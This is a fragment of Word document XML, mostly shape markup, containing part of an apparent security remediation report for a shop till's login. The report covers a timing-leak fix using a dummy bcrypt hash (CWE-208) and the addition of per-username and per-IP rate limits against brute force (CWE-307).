EAPMAAAC1BgAAAAA=&#10;">
                <v:shape id="Shape 1243" o:spid="_x0000_s1027" style="position:absolute;width:26098;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="26098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uLRxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvhf6HZQq9FN3UNqLRVWyhYI9GL97G7JgEs7MhO5r033cLBW8zvPe+ebNcD65RN+pC7dnA6zgB&#10;RVx4W3Np4LD/Gs1ABUG22HgmAz8UYL16fFhiZn3PO7rlUqoI4ZChgUqkzbQORUUOw9i3xFE7+86h&#10;xLUrte2wj3DX6EmSTLXDmuOFClv6rKi45FcXKan/oK07pin1m5dyfpLr7FuMeX4aNgtQQoPczf/p&#10;rY31J+9v8PdNHEGvfgEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBM6uLRxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l2600325,v2630,,4875,930,6735,2784c2608920,4645,2609850,6890,2609850,9525r,114300c2609850,126454,2608920,128693,2607060,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2609850,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CA733A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fixed:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ne response for both, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>401 "The username or password is incorrect."</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> comparison against a dummy hash runs when the user does not exist, so the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>response time</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not leak what the message no longer does without it, a missing user returns in microseconds while a real one costs a full cost-12 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> round. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-208.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D24F5" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C771A3D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD3B0D9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="39" w:line="259"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4304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F32DF18" wp14:editId="7DA55C14">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2713732</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18651</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="409575" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26561" name="Group 26561"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="409575" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="409575" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1273" name="Shape 1273"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="409575" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="409575" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="402680" y="0"/>
                                  <a:pt x="404925" y="930"/>
                                  <a:pt x="406785" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="408645" y="4645"/>
                                  <a:pt x="409575" y="6896"/>
                                  <a:pt x="409575" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="409575" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="409575" y="135973"/>
                                  <a:pt x="408645" y="138218"/>
                                  <a:pt x="406785" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="404925" y="141939"/>
                                  <a:pt x="402680" y="142869"/>
                                  <a:pt x="400050" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>
                                  <a:pt x="0" y="135973"/>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17AAB6A" id="Group 26561" o:spid="_x0000_s1026" style="position:absolute;margin-left:213.7pt;margin-top:-1.45pt;width:32.25pt;height:11.25pt;z-index:-251442176" coordsize="40957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gpSwMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N1os25IRO0Cb5VK0&#10;QZN+AE1RlgBKFEh6Sb++w5FIS7YbNIkPMslZ+ObNcMjrm0PNvR2TqhLN0o+uQt9jDRV51WyW/u/n&#10;+y+p7ylNmpxw0bCl/8KUf7P6/Ol63y5YLErBcyY9cNKoxb5d+qXW7SIIFC1ZTdSVaFkDwkLImmiY&#10;yk2QS7IH7zUP4jCcBXsh81YKypSC1dtO6K/Qf1Ewqn8WhWLa40sfsGn8SvyuzTdYXZPFRpK2rGgP&#10;g7wDRU2qBjZ1rm6JJt5WVmeu6opKoUShr6ioA1EUFWUYA0QThSfRPEixbTGWzWK/aR1NQO0JT+92&#10;S3/sHmT71D5KYGLfboALnJlYDoWszT+g9A5I2YujjB20R2ExCbPpfOp7FERREqcwRkppCbyfWdHy&#10;7lW7wG4ajKDsWygOdYxffSz+p5K0DGlVC4j/UXpVDujj+cT3GlJDlaKGhytIC+o5ktRCAV8fY8hF&#10;ShZ0q/QDE0g12X1XuqvJ3I5IaUf00NihhMp+taZboo2dQWmG3v6Yq9KlykhrsWPPAvW0SVg2jSGf&#10;NtOA86jAm6FiEobhFM7UQNUq0O26ol/Zn7F6PEsH6oAL90vCJOt3zCb9gbSS2TztsMTzNDGFBXDG&#10;vscza5fOks4uMQPk04q6cgXMszSb/UOEFFzazcZ35iyaTCbARWdjtS5jcwCiyTSDkhuhc8CjSRpH&#10;6Vjo2IiA+jkK/5MPx3CURNkkG7t1aTHnd3YidCk+Hu6zPW28HSuufkYWVucSJ5CJLlsXAMz6CjsH&#10;Hs+zrpreyIYpMlOz5wzb9dO02PVBisdh2OA6Ajr1QQ1Z8dhoqHxaixbjafm6mN92HiyJJ+fL8T46&#10;dS5/tpzHsCkXinV1bvoKHknXa7A0jt2MN6btAB+UwNVecKLxjqwrDXc+r2psutBF3LkBb6bXd+0V&#10;R/qFM9ObePOLFdCn8R4yC0pu1t+49HbE3Oz4Q+eEtyXpV3u/vSpCRT/Gvqg4dy4jNB25vLu9j++x&#10;QUBQvbKxY/iocJZhZ0l7NN3LAu5nCNq+L8DeGeHOotHOvoFXEcIcRGuGa5G/4J2MhMDlh9TgMwDj&#10;6J8s5p0xnKPW8WG1+gsAAP//AwBQSwMEFAAGAAgAAAAhAAk1XjLgAAAACQEAAA8AAABkcnMvZG93&#10;bnJldi54bWxMj8Fqg0AQhu+FvsMyhd6SVWvTaF1DCG1PIdCkEHqb6EQl7q64GzVv3+mpvc0wH/98&#10;f7aadCsG6l1jjYJwHoAgU9iyMZWCr8P7bAnCeTQlttaQghs5WOX3dxmmpR3NJw17XwkOMS5FBbX3&#10;XSqlK2rS6Oa2I8O3s+01el77SpY9jhyuWxkFwUJqbAx/qLGjTU3FZX/VCj5GHNdP4duwvZw3t+/D&#10;8+64DUmpx4dp/QrC0+T/YPjVZ3XI2elkr6Z0olUQRy8xowpmUQKCgTgJeTgxmSxA5pn83yD/AQAA&#10;//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMdL6ClLAwAAoAkAAA4AAAAAAAAAAAAAAAAALgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAAk1XjLgAAAACQEAAA8AAAAAAAAAAAAAAAAA&#10;pQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACyBgAAAAA=&#10;">
                <v:shape id="Shape 1273" o:spid="_x0000_s1027" style="position:absolute;width:409575;height:142875;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4095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vDwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/JasMw&#10;EL0X8g9iCr2EWqoDTnCthDRg6KmQ5ZDjYE1sU2tkLDW2/74qBHqbx1un2E22E3cafOtYw1uiQBBX&#10;zrRca7icy9cNCB+QDXaOScNMHnbbxVOBuXEjH+l+CrWIIexz1NCE0OdS+qohiz5xPXHkbm6wGCIc&#10;amkGHGO47WSqVCYtthwbGuzp0FD1ffqxGr76oNJlelMjZ4dr+XHEuVyi1i/P0/4dRKAp/Isf7k8T&#10;56frFfx9E0+Q218AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA7TDrw8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l400050,v2630,,4875,930,6735,2784c408645,4645,409575,6896,409575,9525r,123825c409575,135973,408645,138218,406785,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135973,,133350l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,409575,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V-05b</w:t>
      </w:r>
      <w:r>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No brute-force protection.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> No limiter on </w:t>
      </w:r>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login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the only restriction was the global 60/minute by IP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BAEE28" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="39" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAC8BE2" w14:textId="40344EAC" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="39"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Confirmed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F4927" w14:textId="2481B584" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">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20 consecutive wrong passwords, all processed, none throttled</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, and before V-11 — no log entry either. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-307.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43260DF2"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Fixed with two limits applied together: 5/minute per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username+IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (stops hammering one account) and 20/minute per </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(stops credential stuffing, where each attempt uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>different</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> username and so would never trip a per-username limit). Per-minute limiting rather than a hard lockout, deliberately: a lockout on a shop till is itself a denial of service — an attacker knowing a cashier's username could lock them out mid-shift.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1E045" w14:textId="547F893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5328" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BCA6C97" wp14:editId="2FB4CA7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1837432</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-11954</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1895475" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26563" name="Group 26563"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1895475" cy="571500"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1895475" cy="571500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1290" name="Shape 1290"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1400175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1400175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1390650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1393280" y="0"/>
                                  <a:pt x="1395525" y="930"/>
                                  <a:pt x="1397385" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1399245" y="4645"/>
                                  <a:pt x="1400174" y="6896"/>
                                  <a:pt x="1400175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1400175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1400174" y="126454"/>
                                  <a:pt x="1399245" y="128693"/>
                                  <a:pt x="1397385" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1395525" y="132414"/>
                                  <a:pt x="1393280" y="133344"/>
                                  <a:pt x="1390650"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298" name="Shape 1298"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="962024" y="428625"/>
                            <a:ext cx="933450" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928800" y="930"/>
                                  <a:pt x="930660" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4645"/>
                                  <a:pt x="933450" y="6896"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="135979"/>
                                  <a:pt x="932520" y="138218"/>
                                  <a:pt x="930660" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928800" y="141939"/>
                                  <a:pt x="926555" y="142869"/>
                                  <a:pt x="923925"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E9D490C" id="Group 26563" o:spid="_x0000_s1026" style="position:absolute;margin-left:144.7pt;margin-top:-.95pt;width:149.25pt;height:45pt;z-index:-251441152" coordsize="1895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&#10;ZW